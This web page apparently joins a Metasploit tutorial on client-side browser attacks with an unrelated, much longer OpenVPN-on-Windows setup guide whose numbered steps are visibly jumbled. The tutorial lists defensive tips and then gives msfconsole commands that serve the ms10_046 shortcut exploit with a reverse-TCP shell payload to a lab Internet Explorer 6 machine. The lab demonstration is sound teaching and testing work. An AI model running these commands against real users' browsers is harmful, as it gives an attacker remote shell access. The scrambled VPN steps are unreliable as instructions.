Exploiting Client Side using Metasploit

Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors.

How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user’s web browser.

The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images, web browsers process ecommerce transactions, interact with databases, launch media players, and transfer files. As such, the web and the web browser, was not designed with security in mind. What this means is that the web browser is an opportune target to focus attacks.

Client-side Defense

So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:

  • update and run an antivirus program and antispyware program,
  • update your operating system and web browsers on a regular basis,
  • update media players (eg. Flash, Quicktime), readers (eg. Acrobat), and add-ons regularly
  • update Java
  • do not visit nefarious websites (eg. sites that deal with pirated music and warez)
  • Do not surf the web as an administrator, by making sure to have User Account Control (UAC) enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result

Client-side Attack

In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.

Demo steps:

Launch msfconsole, load the exploit and payload, set the options and launch the exploiting webserver and webpage. see the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost  <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer) browse to your Metasploit server’s IP address using Internet Explorer to launch the client side attack.
12. Once the exploit has finished launching list your sessions:
msf > sessions -l
13. msf > sessions -i 1
14. you should now have a Windows shell to interact with

Easy Windows Guide for Open VPN server client installation

Downloading and Installing OpenVPN

  1. Download the installer from ​here and run it on the server computer.
  1. Install OpenVPN on each client. (This step can be skipped for now and done at any convenient time)

Certificates and Keys

Preparatory Steps

  1. Navigate to the C:\Program Files\OpenVPN\easy-rsa folder in the command prompt:
    1. Press Windows Key + R
    2. Type “cmd.exe” and press Enter.
  1. cmd.exe
  2. cd “C:\Program Files\OpenVPN\easy-rsa”
  3. init-config
  4. notepad vars.bat
  7. set KEY_CITY=SanFrancisco
  8. set KEY_ORG=OpenVPN
  9. set KEY_EMAIL=mail@host.domain
  10. vars
  11. clean-all
    1. Navigate to the correct folder:
  1. Initialize the OpenVPN configuration:
    • NOTE: Only run init-config once, during installation.
  1. Open the vars.bat file in a text editor:
  1. Edit the following lines in vars.bat, replacing “US”, “CA,” etc. with your company’s information:
  1. Save the file and exit notepad.
  1. Run the following commands:

Building Certificates and Keys

  1. The certificate authority (CA) certificate and key:
  1. build-ca
    • When prompted, enter your country, etc. These will have default values, which appear in brackets. For your “Common Name,” a good choice is to pick a name to identify your company’s Certificate Authority. For example, “OpenVPN-CA”:
  • Country Name (2 letter code) [US]:
  • State or Province Name (full name) [CA]:
  • Locality Name (eg, city) [SanFrancisco]:
  • Organization Name (eg, company) [OpenVPN]:
  • Organizational Unit Name (eg, section) []:
  • Common Name (eg, your name or your server’s hostname) []:OpenVPN-CA
  • Email Address [mail@host.domain]:
  1. The server certificate and key:
  1. build-key-server server
  2. build-key mike-laptop
  3. build-dh
    • When prompted, enter the “Common Name” as “server”
    • When prompted to sign the certificate, enter “y”
    • When prompted to commit, enter “y”
  1. Client certificates and keys:
  1. For each client, choose a name to identify that computer, such as “mike-laptop” in this example.
    • When prompted, enter the “Common Name” as the name you have chosen (e.g. “mike-laptop”)
  1. Repeat this step for each client computer that will connect to the VPN.
  1. Generate Diffie Hellman parameters (This is necessary to set up the encryption)

Configuration Files

  1. Find the sample configuration files:
  1. Start Menu -> All Programs -> OpenVPN -> OpenVPN Sample Configuration Files

Server Config File

  1. Open server.ovpn
  1. Find the following lines:
  1. ca ca.crt
  2. cert server.crt
  3. key server.key
  4. dh dh1024.pem
  5. ca “C:\\Program Files\\OpenVPN\\config\\ca.crt”
  6. cert “C:\\Program Files\\OpenVPN\\config\\server.crt”
  7. key “C:\\Program Files\\OpenVPN\\config\\server.key”
  8. dh “C:\\Program Files\\OpenVPN\\config\\dh1024.pem”
  1. Edit them as follows:
  1. Save the file as C:\Program Files\OpenVPN\easy-rsa\server.ovpn

Client Config Files

This is similar to the server configuration

  1. Open client.ovpn
  1. Find the following lines:
  1. ca ca.crt
  2. cert client.crt
  3. key client.key
  4. ca “C:\\Program Files\\OpenVPN\\config\\ca.crt”
  5. cert “C:\\Program Files\\OpenVPN\\config\\mike-laptop.crt”
  6. key “C:\\Program Files\\OpenVPN\\config\\mike-laptop.key”
  7. remote my-server-1 1194
  1. Edit them as follows:
    • Notice that the name of the client certificate and key files depends upon the Common Name of each client.
  1. Edit the following line, replacing “my-server-1” with your server’s public Internet IP Address or Domain Name. If you need help, see Static Internet IP below.
  1. Save the file as C:\Program Files\OpenVPN\easy-rsa\mike-laptop.ovpn (in this example. Each client will need a different, but similar, config file depending upon that client’s Common Name.)

Copying the Server and Client Files to Their Appropriate Directories

  1. Copy these files from C:\Program Files\OpenVPN\easy-rsa\ to C:\Program Files\OpenVPN\config\ on the server:
  1. ca.crt
  2. dh1024.pem
  3. server.crt
  4. server.key
  5. server.ovpn
  6. ca.crt
  7. mike-laptop.crt
  8. mike-laptop.key
  9. mike-laptop.ovpn
  1. Copy these files from C:\Program Files\OpenVPN\easy-rsa\ on the server to C:\Program Files\OpenVPN\config\ on each client (mike-laptop, in this example):

Starting OpenVPN

  1. On both client and server, run OpenVPN from:
  1. Start Menu -> All Programs -> OpenVPN -> OpenVPN GUI
  1. Double click the icon which shows up in the system tray to initiate the connection. The resulting dialog should close upon a successful start.

Further Considerations / Troubleshooting

Firewall Configuration

If you have connection problems, make sure to set a rule on your server’s firewall allowing incoming traffic on UDP port 1194.

Port Forwarding

If your server is behind a router, you will need to forward the port chosen for OpenVPN (in this example UDP 1194) to the server. Consult your router’s documentation for details on this.

To set up port forwarding, you will likely need to set up the server with a static local IP address instead of the default dynamic (changing) IP. Instructions for Windows XP may be found ​here. Make sure to choose a static IP address that is not in the range your router might assign as a dynamic IP, but is within the router’s subnet (usually 192.168.0.xxx , 10.0.0.xxx , or similar).

Static Internet IP

Your server will need to have a static internet IP or Domain Name to be accessible over the long term. One solution is to sign up for an account with DynDNS and install the DynDNS Updater on your server. When signing up you will determine the static Domain Name of your server. (For example, “myserver.dyndns.org”) You will use this Domain Name in the client configuration files as part of the “remote” directive.

Running OpenVPN as a Service

Running OpenVPN as a service will allow:

  1. OpenVPN to be run from a non-administrator account.
  1. OpenVPN to be started automatically on system startup. This is often preferred on the server machine, as well as any machines which will be constantly connected to the server.
  1. Run the Windows Service administrative tool:
    1. Press Windows Key + R
    2. Type “services.msc” and press Enter.
  1. services.msc
  1. Find the OpenVPN service, and set its Startup Type to “automatic.”
  1. Optionally, start the service now.

Security Tips

  1. Transmit all needed files to the client computers using a secure means such as a USB drive (email is not always a secure means).
  2. Choose a port other than UDP 1194, and replace the port number wherever this guide mentions UDP port 1194.

Cloning OpenVPN Servers

If including OpenVPN in a cloned server build you will find that all servers will have the same MAC address for the TAP device. This will cause packet loss across the network. Standard methods of changing the IP address from scripts do not work on the TAP device, to resolve this delete and recreate the TAP device using the scripts included with OpenVPN:

C:\Program Files\OpenVPN\bin\deltapall

C:\Program Files\OpenVPN\bin\addtap

You will then have to rename the connection to match the entry in the config file.

OpenVPN GUI (for Windows)

The official OpenVPN release for Windows ships with a GUI frontend called simply “OpenVPN-GUI” and can be found in the .\bin\ subdirectory of the installation path, with shortcuts placed on the desktop and start menu unless unselected during program installation. This wiki page describes how to use this GUI frontend. The source code for the GUI is available on the ​OpenVPN-GUI project page. Instructions for building the GUI are available here.

The GUI lives in the system tray, so controlling one or more VPN processes is always done through the context menu of the GUI icon. When the GUI is launched, nothing will happen beyond placing the icon in the tray. To do something useful with the GUI, you need to interact with it by right-clicking to bring up the context menu.

Please note the GUI will start the VPN process in the context of the running user. When this user does not have administrative rights (or has rights limited through UAC) it will most likely fail to correctly start the VPN as routes and addressing cannot be changed by unprivileged users.

When starting the OpenVPN GUI, the standard Windows practice of right-clicking on the shortcut and selecting “Run As Administrator” will allow a UAC user to run it in administrative context. If the user lacks admin rights, it will be necessary to “Run As…” and enter credentials for an administrative user. Once started in this fashion, further interaction via the tray icon will be run in the context of the elevated user.

Creating and placing config files

By default, the GUI will present context entries to connect to any *.ovpn file under the .\config\ dir of the installation path (including subfolders.) If you do not place any config files here, the context menu in the GUI will not allow you to connect anywhere (since it has nowhere to connect to.)

After initially launching the OpenVPN-GUI program, the GUI icon will be show in the tray, as shown in the image below. Note that this icon can be hidden when marked “inactive” by the OS, so check the expanding arrows to the left of the system tray if it’s started but not shown.

Context Menu

Right-clicking on the icon will pull up the context menu. This menu will allow you to connect any of the config files placed as explained above. Note that you must name these files with the .ovpn file extension. Windows has a bad habit of hiding “known” file extensions, so be careful not to name a config file something like Sample.ovpn.txt by mistake.

Once you have created a config file, going into the context menu and selecting the “Connect” entry will start openvpn on that config file. A status window will open up showing the log output while the connection attempt is in progress (see first screenshot below.) After successful connection, the status window will be hidden, but can be viewed from the context menu if desired.

Once connected, the context menu will allow that VPN to be disconnected; select that option to terminate the active connection.

VPN instances are running from the GUI, the tray icon will change color to indicate this:

Advanced Features

It is normally not necessary to use some of these advanced features, but they are described briefly below.

Setting a proxy

If a system proxy is required for outbound access to the Internet and the OpenVPN transport must use this proxy in order to send outbound data, the proxy settings under the Settings menu item can adjust this. By default, OpenVPN uses a proxy only if it was specified in the config file, but the GUI allows proxy settings to be used based on the system proxy, or a manually-defined proxy.

Change private key passphrase

If a private key is specified in the configuration, the Change Password selection in the context menu will allow a new passphrase to be specified.

Changing config dir location

The path to consider for locating .ovpn config files will default to the installed OpenVPN .\config\ dir. If desired, this can be changed via registry key at HKLM\SOFTWaRE\OpenVPN-GUI under the key config_dir.

Advanced registry changes

Other registry settings are available at the key noted above, and can be used by an administrator to hide portions of the context menu. This can include removing the Change Password and proxy settings. Note that a user is still able to manually decrypt or change passphrase on RSA keys outside the GUI, such as with the openssl utility. This feature applies only to the display menu options and is not a form of password management or file security.